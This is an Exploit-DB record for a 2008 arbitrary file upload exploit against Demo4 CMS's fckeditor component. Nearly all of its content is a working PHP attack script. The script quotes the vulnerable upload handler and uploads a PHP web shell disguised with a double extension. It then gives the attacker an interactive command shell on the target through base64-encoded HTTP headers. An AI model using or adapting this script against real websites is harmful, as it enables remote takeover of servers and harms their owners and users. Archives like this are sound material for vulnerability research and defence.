{"id": "EDB-ID:5923", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Demo4 CMS 1b - fckeditor Arbitrary File Upload Exploit", "description": "Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit. Webapps exploit for php platform", "published": "2008-06-23T00:00:00", "modified": "2008-06-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/5923/", "reporter": "Stack", "references": [], "cvelist": [], "lastseen": "2016-01-31T23:50:19", "viewCount": 5, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-01-31T23:50:19", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T23:50:19", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/5923/", "sourceData": "<?php\r\n/*\r\n --------------------------------------------------------------\r\n Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload\r\n --------------------------------------------------------------\r\n by Stack\r\n Special thnx for : Egix\r\n [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php\r\n \r\n 41. // Get the posted file.\r\n 42. $oFile = $_FILES['NewFile'] ;\r\n 43.\r\n 44. // Get the uploaded file name and extension.\r\n 45. $sFileName = $oFile['name'] ;\r\n 46. $sOriginalFileName = $sFileName ;\r\n 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;\r\n 48. $sExtension = strtolower( $sExtension ) ;\r\n 49.\r\n 50. // The the file type (from the QueryString, by default 'File').\r\n 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;\r\n 52.\r\n 53. // Check if it is an allowed type.\r\n 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )\r\n 55. SendResults( 1, '', '', 'Invalid type specified' ) ;\r\n 56.\r\n 57. // Get the allowed and denied extensions arrays.\r\n 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;\r\n 59. $arDenied = $Config['DeniedExtensions'][$sType] ;\r\n 60.\r\n 61. // Check if it is an allowed extension.\r\n 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )\r\n 63. SendResults( '202' ) ;\r\n 64.\r\n 65. $sErrorNumber = '0' ;\r\n 66. $sFileUrl = '' ;\r\n 67.\r\n 68. // Initializes the counter used to rename the file, if another one with the same name already exists.\r\n 69. $iCounter = 0 ;\r\n 70.\r\n 71. // The the target directory.\r\n 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )\r\n 73. $sServerDir = $Config['UserFilesAbsolutePath'] ;\r\n 74. else\r\n 75. //$sServerDir = GetRootPath() . $Config[\"UserFilesPath\"] ;\r\n 76. $sServerDir = $Config[\"UserFilesPath\"] ;\r\n 77.\r\n 78. while ( true )\r\n 79. {\r\n 80. // Compose the file path.\r\n 81. $sFilePath = $sServerDir . $sFileName ;\r\n 82.\r\n 83. // If a file with that name already exists.\r\n 84. if ( is_file( $sFilePath ) )\r\n 85. {\r\n 86. $iCounter++ ;\r\n 87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;\r\n 88. $sErrorNumber = '201' ;\r\n 89. }\r\n 90. else\r\n 91. {\r\n 92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;\r\n 93.\r\n 94. if ( is_file( $sFilePath ) )\r\n 95. {\r\n 96. $oldumask = umask(0) ;\r\n 97. chmod( $sFilePath, 0777 ) ;\r\n 98. umask( $oldumask ) ;\r\n 99. }\r\n 100. \r\n 101. $sFileUrl = $Config[\"UserFilesPath\"] . $sFileName ;\r\n 102.\r\n 103. break ;\r\n \r\n*/\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\nfunction http_send($host, $packet)\r\n{\r\n $sock = fsockopen($host, 80);\r\n while (!$sock)\r\n {\r\n print \"\\n[-] No response from {$host}:80 Trying again...\";\r\n $sock = fsockopen($host, 80);\r\n }\r\n fputs($sock, $packet);\r\n while (!feof($sock)) $resp .= fread($sock, 1024);\r\n fclose($sock);\r\n return $resp;\r\n}\r\nprint \"\\n+------------------------------------------------------------+\";\r\nprint \"\\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |\";\r\nprint \"\\n+------------------------------------------------------------+\\n\";\r\nif ($argc < 2)\r\n{\r\n print \"\\nUsage......: php $argv[0] host path\";\r\n print \"\\nExample....: php $argv[0] localhost /booking_calendar/\\n\";\r\n die();\r\n}\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n$data = \"--12345\\r\\n\";\r\n$data .= \"Content-Disposition: form-data; name=\\\"NewFile\\\"; filename=\\\"s.php.he.ll\\\"\\r\\n\";\r\n$data .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\r\n$data .= \"<?php \\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${print(_code_)} ?>\\n\";\r\n$data .= \"--12345--\\r\\n\";\r\n$packet = \"POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=12345\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $data;\r\npreg_match(\"/OnUploadCompleted\\((.*),\\\"(.*)\\\",\\\"(.*)\\\",/i\", http_send($host, $packet), $html);\r\nif (!in_array(intval($html[1]), array(0, 201))) die(\"\\n[-] Upload failed! (Error {$html[1]})\\n\");\r\nelse print \"\\n[-] Shell uploaded to {$html[2]}...starting it!\\n\";\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\nwhile(1)\r\n{\r\n print \"\\nstack-shell# \";\r\n $cmd = trim(fgets(STDIN));\r\n if ($cmd != \"exit\")\r\n {\r\n $packet = \"GET {$path}datacenter/media/{$html[3]} HTTP/1.0\\r\\n\";\r\n $packet.= \"Host: {$host}\\r\\n\";\r\n $packet.= \"Cmd: \".base64_encode($cmd).\"\\r\\n\";\r\n $packet.= \"Connection: close\\r\\n\\r\\n\";\r\n $output = http_send($host, $packet);\r\n if (eregi(\"print\", $output) || !eregi(\"_code_\", $output)) die(\"\\n[-] Exploit failed...\\n\");\r\n $shell = explode(\"_code_\", $output);\r\n print \"\\n{$shell[1]}\";\r\n }\r\n else break;\r\n}\r\n?>\r\n\r\n# milw0rm.com [2008-06-23]\r\n", "osvdbidlist": []}

{}